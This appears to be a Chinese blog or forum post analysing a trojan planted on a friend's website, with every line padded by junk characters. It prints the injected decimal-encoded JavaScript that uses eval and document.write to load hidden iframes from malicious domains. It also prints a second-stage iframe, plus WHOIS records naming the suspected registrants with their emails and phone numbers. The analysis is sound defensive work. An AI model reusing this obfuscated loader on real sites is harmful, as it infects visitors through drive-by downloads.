[原创]一篇刚写的分析木马手记

首发在我的博客里面， {s7 3(B"  
C@o8C%o  
http://www.areway.cn/?p=175 #Sc9&DfX  
o=]\Jy  
z=FOymvC  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： mb\"qD5  
          Svicw`uX0  
<script>t=’60,105,102,114,97,109,101, -~_[2u^3  
32,115,114,99,61,104,116,116,112,58,47,47, 969Y[XQ  
102,114,101,101,46,117,45,117,117,117,46,99, {P{h|+;  
110,47,101,114,114,111,114,46,104,116,109, Tr@|QNu  
32,119,105,100,116,104,61,49,48,48,32,104, GQH15_  
101,105,103,104,116,61,48,62,60,47,105,102, .&i_~?1[N  
114,97,109,101,62′; ln1!%B;  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> v\Y8+dD  
                                                                                                  zJ*(G_H  
<script>t=’60,105,102,114,97,109,101,32,115, 9$q35e  
114,99,61,104,116,116,112,58,47,47,102,114, ''Y'ZsQ;  
101,101,46,117,45,117,117,117,46,99,110,47, `R!%k]$  
101,114,114,111,114,46,104,116,109,32,119, L*#W?WMM v  
105,100,116,104,61,49,48,48,32,104,101,105, VbI$#;:[7  
103,104,116,61,48,62,60,47,105,102,114,97, |Cm6RH$(  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); Ee3-oHa  
document.write(t);</script> ,{C hHnJ%#  
                                                                                                  <B&vfKO^h  
<html xmlns=” Nsf>b8O  
http://www.w3.org/1999/xhtml ~K/_51O'  
“> J?9n4 u  
<head> `s8o2"12  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> }vXiqT  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> Tlm:
:S   
<title>首页 - 爱生活家庭网 Fks #Y1rI  
                                                                                                                                                    JP,yRb\  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 .du2;`[$r  
转换字符串后的大概内容是（谁点击后果自付）： p]eVby"  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… @|PUet_pb  
                                                                                                                                  T -p~8=I  
查询玉米u-uuu.cn的详细信息： Ul<:Yt&nI  
Domain Name: u-uuu.cn
Y|!m  
ROID: 20070901s10001s64972306-cn koa-sy)#L  
Domain Status: ok yz<$?Gblz  
Registrant Organization: 王雷 =5;tB  
Registrant Name: 王雷 5AbY 59  
Administrative Email: czlovexs@126.com XiMd|D  
Sponsoring Registrar: 北京万网志成科技有限公司 XW.k%H4@  
Name Server:ns.yovole.com Nu;?})tF  
Name Server:ns1.yovole.com ^M)+2@6  
Registration Date: 2007-09-01 17:54 7G+E+A5o&  
Expiration Date: 2008-09-01 17:54 K>vi9,4/ks  
最后PING了一下地址 都没有什么…. 6r.#/' "  
                                                                                                #LR.1zZ  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. k`((6  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> {)n@Rq\=v  
<script language=”javascript” src=” d:Oo5t)MN  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script ` 7P%muY.  
>  X`20=x  
这个玉米应该有可能是木马作者的： m-2!r*(zt  
foafau.info的详细信息： nX_w F`n"  
Access to INFO WHOIS information is provided to assist persons in %x-`Y[  
determining the contents of a domain name registration record in the dczq,evp  
Afilias registry database. The data in this record is provided by Oz4vV_a&'  
Afilias Limited for informational purposes only, and Afilias does not 0j :u.x  
guarantee its accuracy.  This service is intended only for query-based 6DG%pF,  
access. You agree that you will use this data only for lawful purposes "Q`Le{  
and that, under no circumstances will you use this data to: (a) allow, tR\cS)  
enable, or otherwise support the transmission by e-mail, telephone, or ZmDM
=qN  
facsimile of mass unsolicited, commercial advertising or solicitations cE^Ljk  
to entities other than the data recipient’s own existing customers; or L0)w~F ?m  
(b) enable high volume, automated, electronic processes that send l* z"wA-  
queries or data to the systems of Registry Operator, a Registrar, or nR=!S5>S  
Afilias except as reasonably necessary to register domain names or USg,=YM  
modify existing registrations. All rights reserved. Afilias reserves Pj
P6^"  
the right to modify these terms at any time. By submitting this query, jf.WmiDC  
you agree to abide by this policy. $|tk?Sps  
Domain ID:D22418703-LRMS P=aYwmC  
Domain Name:FOAFAU.INFO TbD $lx3>  
Created On:20-Nov-2007 16:05:42 UTC d%K&  
Last Updated On:20-Nov-2007 16:05:44 UTC VXnWY8\  
Expiration Date:20-Nov-2008 16:05:42 UTC D}`MY\H  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) t2Px?S?  
Status:CLIENT DELETE PROHIBITED TQtH
U6  
Status:CLIENT RENEW PROHIBITED QM'|k6  
Status:CLIENT TRANSFER PROHIBITED \fsNI T/  
Status:CLIENT UPDATE PROHIBITED P(UY}oU  
Status:TRANSFER PROHIBITED +G6 Ge;  
Registrant ID:GODA-040110615 lA`qB1x  
Registrant Name:liu hong d`,z4_  
Registrant Organization: l{gR6U{e  
Registrant Street1:beijing i#aKW'  
Registrant Street2: o)GesgxFa5  
Registrant Street3: x];i? 4  
Registrant City:beijing 6:q,JB@i  
Registrant State/Province: 5@J]#bp0M  
Registrant Postal Code:100000 ~3Za"q*0s  
Registrant Country:CN Mh2Zj  
Registrant Phone:+86.860108888777 TBIr^n>Z<k  
Registrant Phone Ext.: VU1Wr|  
Registrant FAX: >`
l^ C  
Registrant FAX Ext.: ;H3~r^>c  
Registrant Email:bbbshiji@163.com UIkO_/}  
Admin ID:GODA-240110615 *a^wYWa  
Admin Name:liu hong <iBn-EG l>  
Admin Organization: :Q,~Nw>  
Admin Street1:beijing @?jbah
#  
Admin Street2: p"6ydXn%  
Admin Street3: IML.6<,(Z  
Admin City:beijing CkRilS<  
Admin State/Province: nIZsKbnw  
Admin Postal Code:100000 E[i#8_  
Admin Country:CN I/%L,XyRI  
Admin Phone:+86.860108888777 kRr/x-"  
Admin Phone Ext.: eE_$ADEf  
Admin FAX: O6,2M[a  
Admin FAX Ext.: _kc}:  
Admin Email:bbbshiji@163.com bk1.H@8  
Billing ID:GODA-340110615 yFn~rv
|&G  
Billing Name:liu hong 1\%@oD_zG  
Billing Organization: +s6v!({Z  
Billing Street1:beijing vQGv4  
Billing Street2: LM(r3sonb  
Billing Street3: W7c B  
Billing City:beijing #Cx#U"~G`  
Billing State/Province: Z^BZH/I?  
Billing Postal Code:100000 PC\p>6xT  
Billing Country:CN J7sH]  
Billing Phone:+86.860108888777 e _(';Lk  
Billing Phone Ext.: -Mf-8zw8G  
Billing FAX: PI@?I&
Bo  
Billing FAX Ext.: 505ejO|  
Billing Email:bbbshiji@163.com (! 8y~n1  
Tech ID:GODA-140110615 cE>m/^SKr  
Tech Name:liu hong AiL80W^=d)  
Tech Organization: v0TbQ  
Tech Street1:beijing >
oN Wf  
Tech Street2:  7|yEf  
Tech Street3: ;n.h!wmJ}  
Tech City:beijing Nobu= Z  
Tech State/Province: >l #D9%  
Tech Postal Code:100000 Q{5.;{/eC  
Tech Country:CN RUq[HxF) 6  
Tech Phone:+86.860108888777 K%_UNivN  
Tech Phone Ext.: lWH#/5`h  
Tech FAX: Bt#'6::  
Tech FAX Ext.: "%bU74>  
Tech Email:bbbshiji@163.com t%O)Ti  
Name Server:NS27.DOMAINCONTROL.COM jo1z#!|Yw}  
Name Server:NS28.DOMAINCONTROL.COM UCup {pDp  
Name Server: \D};0#G0&  
Name Server: fq4uiFi<  
Name Server: L&rtN@5;  
Name Server: tqCwbi  
Name Server: h4=mGJpm
 
Name Server: 4cqf=  
Name Server: S&.xgBR  
Name Server: W]Nc6B*gI  
Name Server: Z4:^#98c.  
Name Server: 7=NKbv]  
Name Server: )#GF:.B  
                                                                                                          Q"uK6ANp'  
接着下载每个文件里面的代码： *2}f $8  
一步一步看.. XAi0lN{,  
1M6^Brx  
=HB(N|9_d  
EiaP1o  
i`Qa7  
GY %$7
  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

看过了就是没看懂。。。

要是有全部 就好了 传上来